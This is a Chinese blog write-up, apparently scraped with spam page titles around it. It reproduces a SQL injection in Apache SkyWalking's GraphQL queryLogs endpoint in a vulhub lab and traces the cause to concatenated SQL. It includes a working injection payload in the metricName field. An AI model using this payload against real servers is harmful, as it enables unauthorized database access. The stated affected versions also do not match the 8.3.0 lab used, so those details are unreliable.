当前位置: 首页 > news >正文

域名制作网站吗wordpress纯图片主题

域名制作网站吗,wordpress纯图片主题,线上职业技能培训平台,电脑版网站转手机版怎么做漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参…

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

拉取vulhub

git clone https://github.com/vulhub/vulhub.git

搭建镜像

cd /vulhub/skywalking/8.3.0-sqli
docker-compose up -d

在这里插入图片描述
访问8080端口
在这里插入图片描述

漏洞复现

在首页刷新即可抓到报文。
在这里插入图片描述

输入payload

{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}
}
","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}
}

查看返回结果
在这里插入图片描述
在这里插入图片描述

漏洞复现成功

漏洞原理

源码:https://github.com/apache/skywalking/releases/tag/v8.3.0
graphql是skywalking的一种查询协议,如果请求以下列JSON给出:

{bookById(id: "book-1"){idnamepageCountauthor {firstNamelastName}}
}

则返回结果为:

{"bookById": {"id":"book-1","name":"Harry Potter and the Philosopher's Stone","pageCount":223,"author": {"firstName":"Joanne","lastName":"Rowling"}}
}

通常,graphql中会对对象类型进行定义:

type Query {bookById(id: ID): Book
}type Book {id: IDname: StringpageCount: Intauthor: Author
}type Author {id: IDfirstName: StringlastName: String
}

此次产生漏洞的queryLogs为:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls:
(这里不知道为什么下载的源码中没有,只能跑到github上看)
在这里插入图片描述

oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java
在这里插入图片描述

oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java
在这里插入图片描述

采取了直接拼接的方式。

5、修复方法
修复后使用了占位符,即预编译。

http://www.yayakq.cn/news/651185/

相关文章:

  • wordpress购物网站学校网站建设联系电话
  • 设置自己的网站西安优化网站公司
  • 给装修公司做推广的网站网站制作需要多少费用
  • 剑阁县规划和建设局网站小红书网站开发费用
  • 溧阳网站建设报价龙采网站建设案例
  • 口碑最好的购物网站平台html5网站开发环境的搭建
  • 淄博市住房和城乡建设局官方网站三类医疗器械
  • 网站技术解决方案南昌做网站的公司哪个比较好的
  • 广州开发网站设计网站快速备案安全吗
  • 网站的设计思路怎么写20平米小门店装修
  • 晋州做网站的联系电话价格低不是干粉灭火器的优点
  • 深圳外贸网站开发公司医院网站建设费用
  • 网站建设维护论文小程序商城源代码
  • 企业建设营销网站有哪些步骤变更网站备案信息
  • 网站挂载wordpress主题放在那个文件夹
  • 网络课程系统网站建设费用做网站费用计入什么
  • 网站制作公司员工网站功能流程图
  • 网站上的图片一般多大wordpress安装无法登录
  • 网站设计二级页面怎么做北京pc28网站
  • 网站建设小程序开发报价网络系统管理学什么
  • 百度登录首页百度首页排名优化平台
  • 天津网站建设设计石家庄人口
  • 网站怎么添加导航栏wordpress可以做网页吗
  • 免费网站模板制作大型网站建设完全教程
  • wordpress 做仿站免费logo设计生成器在线制作
  • 上海高端定制网站公司成都公司展厅设计公司
  • 广州网站建设八爪鱼公装网站怎么做
  • 网站建设的程序网站建设开发方式包括购买
  • 广州网站建设开发网吧网络维护公司
  • 电子政务门户网站建设教训目前最新国际消息